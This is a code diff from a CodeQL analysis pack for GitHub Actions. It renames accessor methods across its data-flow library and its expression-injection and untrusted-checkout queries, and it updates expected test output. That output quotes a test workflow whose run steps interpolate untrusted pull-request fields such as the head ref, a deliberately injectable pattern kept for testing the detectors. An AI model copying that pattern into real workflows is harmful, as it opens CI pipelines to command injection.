fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env.", "")) + then source.asExpr() = uses.getEnvVar(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") then source.asExpr() = uses @@ -76,10 +76,10 @@ predicate externallyDefinedStoreStep( ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + then pred.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + then pred.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) else none() ) and succ.asExpr() = uses @@ -90,10 +90,10 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + then sink.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + then sink.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) else none() ) and sinkModel(action, version, input, kind) and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 64df342ae9b..0dea91af2b9 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,9 +36,9 @@ class AdditionalTaintStep extends Unit { predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getEnvExpr(varName) = pred.asExpr() and + r.getEnvVar(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript() and + script = r.getScript().getValue() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index d99db775d61..57ef4743487 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -162,7 +162,7 @@ class ParameterPosition extends string { * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } + ArgumentPosition() { exists(any(Uses e).getArgument(this)) } } /** @@ -301,7 +301,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(Outputs out, string fieldName | - node1.asExpr() = out.getOutputExpr(fieldName) and + node1.asExpr() = out.getOutput(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index dbae273151b..3a21005e29b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -78,12 +78,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgument(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgument(pos) = this.getCfgNode().getAstNode()) } } diff --git a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml deleted file mode 100644 index df2fe6e3734..00000000000 --- a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml +++ /dev/null @@ -1,39 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -inProgress: - primaryLanguage: yaml - installedExtractors: - go: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/go - python: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/python - java: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/java - html: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/html - xml: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/xml - properties: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/properties - cpp: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/cpp - swift: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/swift - csv: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csv - yaml: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/yaml - csharp: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csharp - javascript: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/javascript - ruby: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/ruby -creationMetadata: - cliVersion: 2.16.0 - creationTime: 2024-02-02T10:02:02.082819Z -finalised: false diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 4b78f275382..ac829c2395e 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 0edeb0a7ec8..02e17b76ac5 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 59a05f64b6c..7ca86560998 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 28ff074fd96..fd4350efae8 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 6e88f36fece..7b0f3159357 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 4f710a16e8f..699c5b2b5dc 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 63f1a7a9d3a..1f7797b8a0a 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index b13bf88abe6..0bf4e858db2 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 34bcbd7b060..58561ca6dba 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -21,7 +21,7 @@ private predicate isTrustedOrg(string repo) { exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } -from StepUses uses, string repo, string version, Workflow workflow, string name +from UsesStep uses, string repo, string version, Workflow workflow, string name where uses.getCallee() = repo and uses.getEnclosingWorkflow() = workflow and diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index ed96d5f07c1..2e3dc7049bd 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -32,14 +32,14 @@ class LabelCheck extends If { } } -from Workflow w, Job job, StepUses checkoutStep +from Workflow w, Job job, UsesStep checkoutStep where w.hasTriggerEvent("pull_request_target") and w.getAJob() = job and job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep - .getArgumentExpr("ref") + .getArgument("ref") .(Expression) .getExpression() .matches([ diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ffbbed2bac1..4d290a90604 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -71,156 +71,179 @@ yamlNodes | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | jobNodes -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | stepNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | allUsesNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | stepUsesNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | jobUsesNodes +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesSteps -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | runSteps -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:39:10 | id | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | parentNodes | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | 